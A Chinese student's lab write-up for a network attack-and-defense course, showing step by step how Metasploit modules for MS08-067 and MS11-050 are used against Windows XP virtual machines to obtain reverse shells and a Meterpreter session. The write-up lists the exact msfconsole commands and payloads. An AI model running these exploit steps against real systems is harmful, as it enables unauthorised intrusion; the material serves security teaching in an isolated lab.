1. 程式人生 > >20155305《網絡對抗》MSF基礎應用

20155305《網絡對抗》MSF基礎應用

pre iso鏡像 指令 選項 命令 進行 search 信息 中文簡體

20155305《網絡對抗》MSF基礎應用

實驗過程

實驗系統

  • 靶機1:Windows XP Professional SP2 ,IP地址:192.168.1.108
  • 靶機2:Windows XP Professional SP3 簡體中文,IP地址:192.168.1.113
  • windows XP的虛擬機安裝可以在這個網址下載iso鏡像,至於序列號就百度吧,會有很多。
  • Kali IP地址:192.168.1.105

1、主動攻擊:ms08_067

  • 使用靶機1和Kali
    msfconsole進入msf,再用search ms08_067查詢一下針對該漏洞的攻擊模塊:

技術分享圖片

  • use exploit/windows/smb/ms08_067_netapi
    使用該模塊:

技術分享圖片

  • show targets查看可以被攻擊的靶機的操作系統型號:

技術分享圖片

  • show payloads查看可以供我們使用的攻擊載荷:

技術分享圖片

  • 從中找到一個可用的攻擊載荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp設置payload:

技術分享圖片

  • show options查看需要設置的參數:

技術分享圖片

  • 這裏需要設置RHOST(靶機IP)和LHOST(Kali的IP),使用set 需設置的參數名 參數值命令即可設置:

技術分享圖片

  • 設置target選項目標(例如我攻擊系統為WIN xp 中文簡體 SP2,所以選擇10)

技術分享圖片

  • show options確認需要設置的參數是否已經設置好:

技術分享圖片

  • 確認參數設置無誤後,用exploit指令開始攻擊:

技術分享圖片

  • 攻擊成功後會獲取靶機的shell,可以對其進行操作:

技術分享圖片

2、針對瀏覽器的攻擊:ms11_050

  • 使用靶機2和Kali(一開始用自己的最後會有問題,所以換了老師之前的kali)

search ms11_050查詢一下針對該漏洞的攻擊模塊,並用use windows/browser/ms11_050_mshtml_cobjectelement使用該模塊:

技術分享圖片

  • info查看該模塊的信息(這個指令相當於show targetsshow options等的集合版):

基本信息:

技術分享圖片

  • targets信息:

技術分享圖片

  • options信息:

技術分享圖片

  • set payload windows/meterpreter/reverse_tcp設置payload,並設置需要設置的參數。

技術分享圖片

show options確認需要設置的參數是否已經設置好:

技術分享圖片

  • 確認參數設置無誤後,用exploit指令開始攻擊,攻擊成功後會有靶機需要訪問的網址:

技術分享圖片

  • 在靶機IE上輸入該網址:

技術分享圖片

  • kali中顯示session 1已經創建,並顯示其會話ID:

20155305《網絡對抗》MSF基礎應用